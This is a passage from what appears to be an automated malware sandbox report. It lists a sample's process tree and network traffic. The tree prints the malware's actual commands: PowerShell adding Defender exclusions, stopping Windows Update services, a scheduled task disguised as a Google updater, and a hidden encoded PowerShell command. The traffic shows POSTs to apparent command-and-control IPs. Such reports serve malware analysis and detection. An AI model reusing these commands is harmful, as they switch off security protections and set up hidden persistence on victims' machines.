                                                                              • Suspicious use of SetThreadContext
                                                                              PID:2360
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                3⤵
                                                                                  PID:2396
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:928
                                                                              • C:\Windows\System32\cmd.exe
                                                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                2⤵
                                                                                  PID:2924
                                                                                  • C:\Windows\System32\sc.exe
                                                                                    sc stop UsoSvc
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:2756
                                                                                  • C:\Windows\System32\sc.exe
                                                                                    sc stop wuauserv
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:1772
                                                                                  • C:\Windows\System32\sc.exe
                                                                                    sc stop WaaSMedicSvc
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:2480
                                                                                  • C:\Windows\System32\sc.exe
                                                                                    sc stop bits
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:284
                                                                                  • C:\Windows\System32\sc.exe
                                                                                    sc stop dosvc
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:2056
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1388
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                                                    3⤵
                                                                                    • DcRat
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2816
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                  2⤵
                                                                                    PID:572
                                                                                    • C:\Windows\System32\powercfg.exe
                                                                                      powercfg /x -hibernate-timeout-ac 0
                                                                                      3⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1944
                                                                                    • C:\Windows\System32\powercfg.exe
                                                                                      powercfg /x -hibernate-timeout-dc 0
                                                                                      3⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2480
                                                                                    • C:\Windows\System32\powercfg.exe
                                                                                      powercfg /x -standby-timeout-ac 0
                                                                                      3⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1132
                                                                                    • C:\Windows\System32\powercfg.exe
                                                                                      powercfg /x -standby-timeout-dc 0
                                                                                      3⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2936
                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                    2⤵
                                                                                      PID:776
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                      2⤵
                                                                                        PID:1440
                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                      taskeng.exe {29E8ACD0-29FB-4E4D-A037-527D7FFD8A75} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]
                                                                                      1⤵
                                                                                        PID:1096
                                                                                        • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1696
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                          2⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2956
                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                            3⤵
                                                                                              PID:2848
                                                                                          • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2296
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          C:\Windows\system32\rundll32.exe faeeecbcfb.sys,#1
                                                                                          1⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1264
                                                                                        • C:\Windows\system32\makecab.exe
                                                                                          "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231024124748.log C:\Windows\Logs\CBS\CbsPersist_20231024124748.cab
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          PID:2516
                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                          taskeng.exe {E5A4F1C5-187D-43D4-B645-D8B79A8B765A} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                          1⤵
                                                                                            PID:1532
                                                                                            • C:\Program Files\Google\Chrome\updater.exe
                                                                                              "C:\Program Files\Google\Chrome\updater.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2368
                                                                                          • C:\Windows\system32\conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe "127166245121191750591261898393-16639780591593456675-6373542911883232158-346672446"
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1460
                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                            gpscript.exe /RefreshSystemParam
                                                                                            1⤵
                                                                                              PID:1092

                                                                                            Network

                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://193.233.255.73/loghub/master
                                                                                              2FX2793.exe
                                                                                              Remote address:
                                                                                              193.233.255.73:80
                                                                                              Request
                                                                                              POST /loghub/master HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=eGCT78ywYd7BKandN4g1
                                                                                              Content-Length: 213
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
                                                                                              Host: 193.233.255.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Tue, 24 Oct 2023 12:46:13 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 8
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Referrer-Policy: same-origin
                                                                                            • flag-us
                                                                                              DNS
                                                                                              www.facebook.com
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              www.facebook.com
                                                                                              IN A
                                                                                              Response
                                                                                              www.facebook.com
                                                                                              IN CNAME
                                                                                              star-mini.c10r.facebook.com
                                                                                              star-mini.c10r.facebook.com
                                                                                              IN A
                                                                                              157.240.247.35
                                                                                            • flag-fi
                                                                                              POST
                                                                                              http://77.91.124.1/theme/index.php
                                                                                              explothe.exe
                                                                                              Remote address:
                                                                                              77.91.124.1:80
                                                                                              Request
                                                                                              POST /theme/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 77.91.124.1
                                                                                              Content-Length: 88
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:46:24 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 6
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/login
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /login HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                              content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: same-origin
                                                                                              cross-origin-opener-policy: unsafe-none
                                                                                              Pragma: no-cache
                                                                                              Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                              Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: DENY
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              Content-Type: text/html; charset="utf-8"
                                                                                              X-FB-Debug: k8b/W0f/3s4dnM/dilCwwVjn2uDSpBWU0M6+VSJ+CVOb5yiQJ27U8jrlFUfq3+FpeBhjBPn78kVIkpVT8ggoQA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/images/cookies/cookie_info_card_image_2.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /images/cookies/cookie_info_card_image_2.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              content-md5: wRZKtl/35CrbFpdeWSFrBg==
                                                                                              Edge-Control: cache-maxage=86400s
                                                                                              Expires: Wed, 25 Oct 2023 02:06:40 GMT
                                                                                              Cache-Control: public,max-age=86400
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              origin-agent-cluster: ?0
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              X-FB-Debug: Gh++BwuIEw+QJkpHNBrYYSk+zfKxliPlUAfSe707OJB5eq93AacCJptI0c4uTXU5+WkVQCuLeU0J7XJ6HAPSEQ==
                                                                                              Date: Tue, 24 Oct 2023 02:06:40 GMT
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 21306
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /images/cookies/cookie_info_popup_image_1.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              content-md5: VavMdY6kTjDMa/KajpYRaQ==
                                                                                              Edge-Control: cache-maxage=86400s
                                                                                              Expires: Tue, 24 Oct 2023 23:49:00 GMT
                                                                                              Cache-Control: public,max-age=86400
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              X-FB-Debug: E6MrXx5wace9+oi0CM8meoqJ0173yZpDJnpMk5S6yIwJlZ+KPQo23BKuPFPa/oJ318RHGTWtCT4U8iYOGKS6QA==
                                                                                              Date: Mon, 23 Oct 2023 23:49:00 GMT
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 50380
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/images/cookies/cookie_info_card_image_3.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /images/cookies/cookie_info_card_image_3.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              content-md5: tjvKzjcx509sRQAttysmgw==
                                                                                              Edge-Control: cache-maxage=86400s
                                                                                              Expires: Wed, 25 Oct 2023 10:12:08 GMT
                                                                                              Cache-Control: public,max-age=86400
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              X-FB-Debug: c2lNxO+t0WVBxdkGsdR3hr9TqdPdzjCnoZrlX6okjcxetse2kaqRESb4kCaZCmwA/xNMg5RrhcLFdPszD6NZUw==
                                                                                              Date: Tue, 24 Oct 2023 10:12:08 GMT
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 35554
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://www.facebook.com/images/cookies/cookie_info_card_image_4.png
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.247.35:443
                                                                                              Request
                                                                                              GET /images/cookies/cookie_info_card_image_4.png HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: www.facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: image/png
                                                                                              Access-Control-Allow-Origin: *
                                                                                              content-md5: mXjbZp5JUjt62zr4DVYbGw==
                                                                                              Edge-Control: cache-maxage=86400s
                                                                                              Expires: Tue, 24 Oct 2023 22:26:08 GMT
                                                                                              Cache-Control: public,max-age=86400
                                                                                              reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
                                                                                              report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              X-FB-Debug: ssrQSjuMjwaGeEJoplftn4f92hDgdZ2+Kup6xSHMQqXMElLuN7Q7zskNabY5kaVR3rBQKGZwq6/hk38McxHzZg==
                                                                                              Date: Mon, 23 Oct 2023 22:26:08 GMT
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 17083
                                                                                            • flag-us
                                                                                              DNS
                                                                                              accounts.google.com
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              accounts.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              accounts.google.com
                                                                                              IN A
                                                                                              142.250.179.141
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 302 Moved Temporarily
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Set-Cookie: __Host-GAPS=1:YyWD7qWpRvpvslJRRPC_C_bgglB5Dg:sq_SjoC0zbU_H7n6;Path=/;Expires=Thu, 23-Oct-2025 12:46:24 GMT;Secure;HttpOnly;Priority=HIGH
                                                                                              X-Frame-Options: DENY
                                                                                              Content-Security-Policy: script-src 'nonce-tMW-x_GEgSCQYNAW8ixTUw' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                              Location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
                                                                                              Content-Encoding: gzip
                                                                                              Date: Tue, 24 Oct 2023 12:46:24 GMT
                                                                                              Expires: Tue, 24 Oct 2023 12:46:24 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Server: GSE
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:YyWD7qWpRvpvslJRRPC_C_bgglB5Dg:sq_SjoC0zbU_H7n6
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:24 GMT
                                                                                              Location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyw1fqnJmEo7uy6A7MF1VEB6Z999Qk7c8F6z2dBQ2TIdW2ttbCo-59nevQohK8qgnd6uzcaCGg
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Content-Security-Policy: script-src 'nonce-6go1atP47_-fK6ZBVY-lyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: unsafe-none
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyw1fqnJmEo7uy6A7MF1VEB6Z999Qk7c8F6z2dBQ2TIdW2ttbCo-59nevQohK8qgnd6uzcaCGg
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyw1fqnJmEo7uy6A7MF1VEB6Z999Qk7c8F6z2dBQ2TIdW2ttbCo-59nevQohK8qgnd6uzcaCGg HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:YyWD7qWpRvpvslJRRPC_C_bgglB5Dg:sq_SjoC0zbU_H7n6
                                                                                              Response
                                                                                              HTTP/1.1 302 Moved Temporarily
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: DENY
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:24 GMT
                                                                                              Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyMxAAUkQcBgxT8oKYLaTpqquFKlgCf1BXOhgEJwGMa8ccXhJvx5CzR7HyNkABFHUWZTToLxQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-938975925%3A1698151584909921&theme=glif
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-8j3W0_bq9s1ToNRN-Nn4UQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                              Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                              Content-Encoding: gzip
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Server: GSE
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyMxAAUkQcBgxT8oKYLaTpqquFKlgCf1BXOhgEJwGMa8ccXhJvx5CzR7HyNkABFHUWZTToLxQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-938975925%3A1698151584909921&theme=glif
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
